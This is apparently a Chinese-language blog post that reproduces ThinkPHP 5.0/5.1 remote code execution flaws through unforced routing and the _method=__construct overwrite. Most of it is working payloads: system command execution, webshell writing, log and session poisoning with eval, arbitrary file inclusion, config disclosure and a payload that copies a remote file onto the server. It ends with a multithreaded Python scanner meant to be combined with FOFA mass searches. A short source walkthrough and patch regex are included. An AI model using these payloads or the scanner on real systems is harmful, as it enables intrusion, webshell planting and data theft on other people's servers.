之前只是学会如何去利用,但是没有掌握这个漏洞的原理,因此这里复现一下这个漏洞,并且总结出一些利用方法
Thinkphp有两大版本的区别
ThinkPHP 5.0-5.0.24
ThinkPHP 5.1.0-5.1.30
5.0.x
?s=index/think\config/get&name=database.username // 获取配置信息
?s=index/\think\Lang/load&file=../../test.jpg // 包含任意文件
?s=index/\think\Config/load&file=../../t.php // 包含任意.php文件
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=whoami
5.1.x
?s=index/\think\Request/input&filter[]=system&data=pwd
?s=index/\think\view\driver\Php/display&content=<?php phpinfo();?>
?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
这些都是因为PHP未开启强制路由造成的,还有一种是利用变量覆盖达到命令执行的目的
http://php.local/thinkphp5.0.5/public/index.php?s=index
post
_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo
_method=__construct&filter[]=system&method=GET&get[]=whoami
# ThinkPHP <= 5.0.13
POST /?s=index/index
s=whoami&_method=__construct&method=&filter[]=system
# ThinkPHP <= 5.0.23、5.1.0 <= 5.1.16 需要开启框架app_debug
POST /
_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls -al
# ThinkPHP <= 5.0.23 需要存在xxx的method路由,例如captcha
POST /?s=xxx HTTP/1.1
_method=__construct&filter[]=system&method=get&get[]=ls+-al
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls
下面会分逐一析一下
未开启强制路由命令执行
常见Paylaod如
?s=index/\think\Request/input&filter[]=system&data=pwd
?s=index/\think\view\driver\Php/display&content=<?php phpinfo();?>
?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
首先 ThinkPhp默认开启了路由的兼容模式
?
那么在路由未过滤的情况下,我们就可以调用任意函数,因此就造成我们前面的命令执行
例如 think\view\driver\Php 中的 display 方法
?
我们传入一个 content就可以代码执行了
?
我们在 App.php 的解析路由中下个断点
?
这里面在前面实例化了 request 然后调用 routeCheck
跟进一下
?
首先通过 path() 方法获取我们传入的路径()
?
没有过滤
?
接着在进入路由检测
?
其实就是把 / 变为 |
?
之后再进入 parseUrl
?
?
将 / 换为 |
在进入 parseUrlPath
?
根据 | 取出,模块 控制器 操作 以及参数
?
最后可以看见调用了我们想利用的控制器
使用 \think\view\driver\Think
后面测试这个也可以
?s=index/\think\view\driver\Think/display&template=<?php%20phpinfo();?>
?
利用扩展
命令执行
既然我们可以控制了调用这些控制器,那么我们才总结一下有哪些可用的GetShell的方法吧
使用 \think\view\driver\Php
?
直接执行Php代码
?s=index/\think\view\driver\Php/display&content=<?php%20phpinfo();?>
?
使用 \think\App
?
这个类中的 invokeFunction 方法可以任意函数执行
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l
?
使用 \think\Request
看师傅们的文章这个类中的 input 函数可以执行任意函数
我看了下我的环境,发现不可以(应该是环境问题)
?
?s=index/\think\Request/input&filter[]=system&data=pwd
使用 \think\Container
我这边环境没这个类
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
写Webshell
使用 \think\app 写Shell
可以命令执行就可以写了~
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=copy(%27远程地址%27,%27333.php%27)
使用 \think\template\driver\file
?
直接写Shell
?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>
使用 \think\view\driver\Think
利用模板生成Shell
?
?s=index/\think\view\driver\Think/display&template=<?php phpinfo();?>
shell位于runtime/temp/md5(template的值).php
?
并且这个也可以执行命令
?
其他利用
5.0.x
?s=index/\think\config/get&name=database.username // 获取配置信息
?s=index/\think\Lang/load&file=../../test.jpg // 包含任意文件
?s=index/\think\Config/load&file=../../t.php // 包含任意.php文件
第一个使用 \think\config 获取配置信息
?
?
?
?
第二个任意文件包含利用的是 \think\Lang
?
?s=index/\think\Lang/load&file=./shell.php
?
第三个包含任意Php文件利用 \think\Config
?
验证了后缀名
?s=index/\think\Config/load&file=./shell.php
?
修复方式
// 获取控制器名
$controller = strip_tags($result[1] ?: $config[‘default_controller‘]);
if (!preg_match(‘/^[A-Za-z](\w|\.)*$/‘, $controller)) {
throw new HttpException(404, ‘controller not exists:‘ . $controller);
}
使用正则获取控制器
?
小小总结
关于Thinkphp路由的利用就到这里面了,其实分析的并不是很好,因为这个框架我没有多去了解他,甚至有一些地方是断章取义的,但是这些只是作为本人学习和记录,望大家谅解.
还有就是利用方法的改变,对于现在直接RCE的机会不大,一般都是去文件包含等日志,反序列化等,文末后面会记录一下
method __contruct导致的RCE
简单的测试一下
?
首先现在 \think\Request.php 中下断点
?
这里面存在变量覆盖,就是将 $this->method 的值覆盖为我们传入的值
?
我们看一下 var_method 的值
?
并且后面我还可以用这个调用此类的任意函数
?
Payload里面选择的函数是此类的构造函数
?
这里面存在覆盖,我们可以将此类中的任意属性替换掉
?
这个是 Payload 构造的
但是这个会在什么时候被调用呢?
在 App.php 中,若开启了Debug,会调用 param() 方法
?
?
调用 Method() 方法
Method就是我们可以覆盖变量的方法
跟进 Server()
?
调用 input ,这里面有两个参数可控
跟进
?
调用 filterValue ,且1 3参数可控
?
最后达到命令执行
?
?s=captcha
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls
有很多不懂的地方,我这里面只是断章取义的理解,勿喷
?
每个版本的利用方法可以参考
https://y4er.com/post/thinkphp5-rce/
ThinkPhp的多种利用方式
写Shell进日志
_method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=<?php eval($_POST[‘x‘])?>
写入的日志位于 runtime/log/202011/07.log //根据日期决定
_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=../runtime/log/202011/07.log&x=phpinfo();
?
包含Session
写入Session
_method=__construct&filter[]=think\Session::set&method=get&get[]=<?php eval($_POST[‘x‘])?>&server[]=1
包含
_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=/tmp/sess_kking&x=phpinfo();
//kking改为你的session的ID
?
参考这个大佬的
https://xz.aliyun.com/t/6106
批量检测脚本
既然分析完了,就来写个批量的分析脚本试试看吧
分析通用型
因为是扫描器所以我们需要选择一个稳定的 Payload(最好很多版本都可用的),这里面我选择的是 \think\app 里面的 invokefunction 函数
分析实战性
实战中一般有很大的可能会遇到 宝塔 或者其他waf设备,因此不适用于命令执行、代码执行直接验证
我这里面使用Var_dump验证
?
?s=index/\think\app/invokefunction&function=var_dump&vars[0]=this%20a%20test
这个是针对于未开启强制路由的,接下来我们换成变量覆盖的试试
?
?s=captcha
_method=__construct&filter[]=var_dump&method=get&server[REQUEST_METHOD]=aa623a8a2a34729b095ffaf5b48d48b0
接下来就来写脚本了,下面是写的测试脚本,支持url以及文件
Argument is lose
Example: xx.py -u url
Example: xx.py -f 1.txt
#coding=utf-8
from argparse import ArgumentParser,FileType
import sys
import requests
from queue import Queue
from threading import Thread
import warnings
warnings.filterwarnings("ignore")
proxies={
‘http‘:"http://127.0.0.1:8088",
}
pocurl="/index.php?s=index/\\think\\app/invokefunction&function=var_dump&vars[0]=aa623a8a2a34729b095ffaf5b48d48b0"
postdata={
"_method":"__construct",
"filter[]":"var_dump",
"method":"get",
"server[REQUEST_METHOD]":"aa623a8a2a34729b095ffaf5b48d48b0"
}
def worker(q):
while True:
try:
data=q.get()
workerone(data)
except Exception as e:
pass
finally:
q.task_done()
pass
def workerone(url):
if "http" not in url:
url="http://"+url
url2=str(url).replace("index.php","")+pocurl
url1=str(url).replace("index.php","")+"/index.php?s=captcha"
verity1=requests.get(url2,timeout=15, verify=False)
if "aa623a8a2a34729b095ffaf5b48d48b0" in verity1.text:
print(url+"Exist vuln,\npayload:"+url)
verity2=requests.post(url1,data=postdata,timeout=15, verify=False)
if "aa623a8a2a34729b095ffaf5b48d48b0" in verity2.text:
print(url+" Exist vuln\npayload:?s=captcha\n_method=__construct&filter[]=var_dump&method=get&server[REQUEST_METHOD]=aa623a8a2a34729b095ffaf5b48d48b0")
def main():
if len(sys.argv) < 3:
print("Argument is lose")
print("Example: xx.py -u url\nExample: xx.py -f 1.txt")
exit(0)
if sys.argv[1] == "-u":
workerone(sys.argv[2])
if sys.argv[1]=="-f":
file=open(str(sys.argv[2]))
q=Queue(20)
for _ in range(20):
t=Thread(target=worker,args=(q,))
t.start()
for line in file.readlines():
line=line.strip()
q.put(line)
q.join()
if __name__==‘__main__‘:
main()
再配合fofa批量查询
?
不过因为这个漏洞很久了,因此效果不是很理想
参考
https://y4er.com/post/thinkphp5-rce/
https://github.com/Mochazz/ThinkPHP-Vuln
https://xz.aliyun.com/t/6106